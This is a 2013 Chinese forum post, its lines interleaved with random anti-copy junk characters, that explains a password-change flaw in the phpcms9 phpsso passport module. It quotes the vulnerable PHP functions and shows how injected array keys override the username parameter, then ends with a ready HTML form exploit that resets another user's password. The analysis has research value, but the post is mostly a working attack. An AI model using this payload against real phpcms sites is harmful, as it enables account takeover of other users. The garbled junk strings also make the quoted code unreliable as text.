提到的通行证的代码:
9 t+ ?9 K3 g, }& J; y9 c, o- `) ~% B- C
4 d( C# L4 @7 f6 P- L5 `5 C, ^( `0 J
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);; M. T2 L& A; Q9 D2 q
- h' R! p. r( G8 I/ S: Y0 M w在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
5 q$ [: D7 B8 y5 N* y! W3 X( X2 f; _% ~+ }( K! g
我把它留给了你们。# V* B8 M" V% _8 B4 ?4 n3 x3 S) F
不知道你们发现了它没有。
- W. I M$ v* Q+ p9 L5 a" q) P7 `3 b2 N6 @8 z3 g6 u1 ?* I+ v: c1 V* ~9 t
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
6 m: k8 {( h7 g6 i8 z% H
* y- i) u% W2 f/ O! k) @+ W所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。& c5 G4 E9 s+ U0 L7 c) s& X
& p2 c% G+ q& P/ p& C! e2 M也就是
B5 A' [, d, @1 j. P5 X# m8 q' Z. f3 `" F, _/ u
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。4 e( M P; T1 P9 [0 v Q3 f
4 p& J# o7 i4 J, Z: o4 g
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。* h4 l& \; N p
: z2 e0 N6 i7 \8 ~
, q" x! h4 F4 {* S. b8 B' g K其实我们有这样的机会,看看代码,如下:
! F1 w4 E7 G3 ^9 Z& o# [! G4 a
% |; f6 K6 F4 q) V1 l: t0 f
1 f. v! q! F4 c2 j4 _% X8 K$ `public function auth_data($data) {
0 b4 k8 O& l1 `) s0 {! T1 } $s = $sep = '';$ S1 b0 T3 ^5 D7 M0 z
foreach($data as $k => $v) {- p- \! M3 b9 ^* \5 Z E
if(is_array($v)) {
- N9 A( M- X% J5 e $s2 = $sep2 = '';4 w& z* t1 h- M7 l, V7 Z8 W" R
foreach($v as $k2 => $v2) {
6 H9 q1 C8 {) E L+ S! t5 j5 L: k $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);7 [( n4 K1 |* d, _4 Y: Y
$sep2 = '&';
& f8 W) V& S( F/ C0 _1 G) @ }' q3 O3 k# g- V/ _: Y5 d" q
$s .= $sep.$s2;& \) f, ^5 x/ t8 V, q. t2 q( Z$ c, F
} else {8 n+ t# f3 K! @; O: m; T
$s .= "$sep$k=".$this->_ps_stripslashes($v);
: ^5 p% K8 {0 z( e& t }8 h+ X2 J5 c0 r D3 l' x6 j- `1 C
$sep = '&';
7 n- m9 g5 q' I2 g1 S) }- I& @ }" S& y) ]+ A, b$ K, O4 q
5 A4 l" ?# g' N! o, k; W, R: \
$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));1 M- `; t4 n$ P* ], j) r
return $auth_s;8 Z- ?7 B, s" E: X" _
}3 R1 R# C3 m+ a& ]) N1 ? H. E/ w
/ W: d+ w- r& t, S, v
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
0 K$ \! {. n5 ~% G% K/ N. g8 z0 s' i4 H# w
举个例子+ [1 G t& x: `
9 Y8 X0 @$ \8 W7 |: J, o+ Q$a[aaa=a&bbb] = 'a';
8 U# q# D4 b# J& B/ ~
$ D9 w2 a/ c% `. j会变成aaa=a&bbb=a
0 H& \! s) y5 {- ]% V* Z9 r4 L# X% e6 K- {
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
' _- T: L0 k' R
+ G6 @/ Y, |$ O7 @% l& Y( D# G) t这个时候,我们可以再去看一个函数。
+ \' Q2 m$ a) |; X$ z, o& K( g
* h' a E2 u7 W5 i# \就在这个文件内:) R+ [) Y/ J+ _; o; t
- t8 T, W5 L( j1 L4 w
0 R3 A P# q( [4 J( E# ]" Xpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {2 e- S; X$ Q; j7 ]3 O& _: @
if($email && !$this->_is_email($email)) {6 K4 B* q0 c6 M0 w' I* r
return -4;
+ b9 a8 A; w: S; K' Y2 Y. Q }0 b% W" {- M- S
return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));# T& P' z6 b& g7 p/ L
}
! w' m! G9 c1 @6 s4 s( Z4 r! E/ d2 b% p" t# [+ x2 S' `
这是向通行证发了这样一个请求。! o. ~6 h$ e! B4 W+ E' M9 Q
) y4 N4 q& w9 W5 q; k( ]: l* e我们再跟到通信证代码里去看看,就会有所发现。
; x, N$ J8 C5 l$ i* T/ M/ ]
5 D4 }9 _0 ?; I- q$ T- z! v& ]. ~4 E2 [. o6 d
public function edit() {
% }5 E3 E0 E8 A( ^. ?( e! `' m/ O//能省就省,太长了不是吗?: W( M- J0 K: E9 ?: o% _
+ R+ u. e% `* _ ]3 [
if($this->username) {
% D& l& s' X2 H- O- y& n2 u# _//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。' g" P" q9 U5 s ~7 k3 D/ y/ J
$res = $this->db->update($data, array('username'=>$this->username));3 J. n9 n8 E+ f( w c- r6 N
} else {2 ]* k/ A( a& w$ @
file_put_contents('typeb.txt',print_r($data,1).$this->uid);* {$ s4 W5 O+ \: z* m2 y- A
$res = $this->db->update($data, array('uid'=>$this->uid));
' ] l. \ C5 c' e& t$ p/ K, K" ? }* S) H7 N8 b8 h1 s4 O8 J3 p
- A$ X5 u6 f& n7 r
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
/ H7 n. |# H) w( C% Y, Z& P9 X% J- D8 j0 a, x! w: G4 h, F
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
) L1 {2 ~6 c- U8 F3 r; G7 B7 S# O; e: @' r
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
9 I/ X. V2 o3 ^7 R4 L) D. _4 N' k: | R
4 o8 U$ F" l0 t6 ~5 @. ]0 I; b我当然找到了:6 e& ?# i! d% {9 i \" Y T
phpcms9/phpcms/modules/member/index.php; {# k; L1 u. K6 d9 q+ Z( e8 a2 m, i
" g( y5 P5 g4 Q8 d
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
! F7 f7 e; E5 t2 n
' A" X4 D2 l5 A% V2 x然后就没有然后了。' A R, y' J; b4 \4 O
7 ]; ~+ p/ b/ Y5 N4 S$ `2 h<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">* `6 [" N( F( `# i& p
<table width="100%" cellspacing="0" class="table_form">
% R9 h l6 @" H4 E <tr>5 S# P+ o- J" ]: y; |$ l
<th width="80">邮箱:</th>
& ^* h1 D f x! R& t) {4 v <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>5 X$ s, M% g4 f+ _, B9 q# S7 h
</tr>* @3 |& ~- T# M( O( j
<tr>; I( w* O$ C* u$ _; ~
<th width="80">原密码:</th> # q3 R% I: \# U* V
<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
- D; Y5 |# C2 ^4 u6 ^! Z </tr>+ t8 l! v& |! s$ x
<tr>" n5 q- c% R9 ` Q
<th>新密码:</th>, _ l: R, C: F# a- A# t2 ^# `
<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>+ C0 H* n. e% T+ r
</tr>0 z8 R* A8 P/ ~
<th></th>( h" H8 {1 J( U1 W5 E
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
$ X' J, }# M& V$ A: L+ v3 u </tr>
' v/ N. g4 q: T& P1 n </table>
3 A; W* S( t3 s9 p% x+ o4 A
! k+ M/ _! Y: B2 \ 0 \: H# n" a, x$ _5 p6 ?
</form>: A+ i+ E% T" I6 P6 `
|
发表于 2013-2-23 14:46:35
收藏
支持
反对